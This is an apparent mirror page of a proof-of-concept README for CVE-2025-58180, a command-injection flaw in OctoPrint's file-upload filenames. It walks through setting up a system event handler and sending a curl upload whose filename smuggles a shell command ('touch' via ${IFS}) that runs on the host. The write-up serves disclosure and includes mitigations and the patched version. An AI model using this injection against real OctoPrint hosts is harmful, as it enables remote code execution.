Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-58180 PoC — OctoPrint is Vulnerable to RCE Attacks via Unsanitized Filename in File Upload

Source
https://github.com/prabhatverma47/CVE-2025-58180
Associated Vulnerability
Title:OctoPrint is Vulnerable to RCE Attacks via Unsanitized Filename in File Upload (CVE-2025-58180)
Description:OctoPrint provides a web interface for controlling consumer 3D printers. OctoPrint versions up until and including 1.11.2 contain a vulnerability that allows an authenticated attacker to upload a file under a specially crafted filename that will allow arbitrary command execution if said filename becomes included in a command defined in a system event handler and said event gets triggered. If no event handlers executing system commands with uploaded filenames as parameters have been configured, this vulnerability does not have an impact. The vulnerability is patched in version 1.11.3. As a workaround, OctoPrint administrators who have event handlers configured that include any kind of filename based placeholders should disable those by setting their `enabled` property to `False` or unchecking the "Enabled" checkbox in the GUI based Event Manager. Alternatively, OctoPrint administrators should set `feature.enforceReallyUniversalFilenames` to `true` in `config.yaml` and restart OctoPrint, then vet the existing uploads and make sure to delete any suspicious looking files. As always, OctoPrint administrators are advised to not expose OctoPrint on hostile networks like the public internet, and to vet who has access to their instance.
Description
In OctoPrint version <=1.11.2, an attacker with file upload access (e.g., valid API key or session) can craft a malicious filename that bypasses sanitization and is later executed by OctoPrint’s event system, leading to remote code execution (RCE) on the host
Readme
# CVE-2025-58180 RCE in OctoPrint via Unsanitized Filename in File Upload
In OctoPrint version &lt;=1.11.2, an attacker with file upload access (e.g., valid API key or session) can craft a malicious filename that bypasses sanitization and is later executed by OctoPrint’s event system, leading to remote code execution (RCE) on the host

---

## PoC: Steps to Recreate Vulnerability

### Step 1: Version Info
Downloaded latest stable release: **OctoPrint 1.11.2**

<img width="424" height="110" alt="image" src="https://github.com/user-attachments/assets/e7a16a14-29c0-4a15-958a-93417a94e346" />

---

### Step 2: Run OctoPrint
```bash
octoprint serve --port 5000 --debug
```

- Open [http://127.0.0.1:5000](http://127.0.0.1:5000) in browser.  
- Go through the initial wizard → create user with default settings (disabled: connectivity, anonymous, plugin).  
- Grab the API key from **Settings → API** → save for later.  
<img width="1626" height="973" alt="image" src="https://github.com/user-attachments/assets/52f45d63-aed0-41b8-bdf8-a60c958e92a0" />

Stop the OctoPrint service once above steps are done.

---

### Step 3: Configure Event Subscription
Following [OctoPrint events documentation](https://docs.octoprint.org/en/master/events/index.html):

Edit `~/.octoprint/config.yaml`:

```yaml
events:
  enabled: true
  subscriptions:
    - event: FileAdded
      type: system
      debug: true
      command: "{path}"
```
<img width="880" height="305" alt="image" src="https://github.com/user-attachments/assets/942c253c-70c7-495c-8d29-f575d366b21a" />

---

### Step 4: Create Sample G-code
Create `/tmp/gcode/ok.gcode`:

```gcode
; minimal gcode
G28
M105
```

Restart OctoPrint service.

---

### Step 5: Proof of Concept RCE

1. Export API key:
```bash
export API_KEY='<key previously gathered from webUI>'
```

2. Verify file doesn’t exist:
```bash
ls -la /tmp/test123
```

3. Craft malicious filename payload:  
`INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode'`  

Explanation: `${IFS}` is the shell’s Internal Field Separator (usually a space). It bypasses sanitization when injected.

4. Send curl request:
```bash
curl -sS -X POST -H "X-Api-Key: $API_KEY" \
  -F "file=@/tmp/gcode/ok.gcode;filename=\"${INJECT_NAME}\"" \
  "http://127.0.0.1:5000/api/files/local"
```

5. Verify execution:
```bash
ls -la /tmp/test123
```
<img width="1170" height="511" alt="image" src="https://github.com/user-attachments/assets/19fc4c6a-f488-4ae1-9032-ab10b23cd227" />

If `/tmp/test123` exists, the injected command executed successfully → **RCE confirmed**.

---

## Explanation of Flow

```
[User upload with crafted filename]
        │
        ▼
server/api/files.py → accepts raw filename (metacharacters survive sanitize_name)
        │
        ▼
events.py (EventManager.fire "FileAdded") → payload {path} includes raw chars
        │
        ▼
system command subscriber → subprocess.check_call(..., shell=True)
        │
        ▼
[Injected shell metacharacters execute as OS commands]
```

---

## Summary

When a file is uploaded:

1. OctoPrint accepts the filename (with limited sanitization).  
2. It triggers a **FileAdded** event.  
3. If system commands are subscribed to this event, the raw filename (including `;`, `${IFS}`, etc.) is passed into a shell.  
4. This allows injected commands inside the filename to execute on the host.  

**Result:** Remote Code Execution (RCE) on the host system.
---

## References

- **CVE Assigned:(CVE-2025-58180)** [GHSA-49mj-x8jp-qvfc](https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc)
- Patched version: 1.11.3
---
File Snapshot

 [4.0K]  /data/pocs/e453d9f91797bd5c94c6ebf9b7cb40cb394eead9
└── [3.6K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →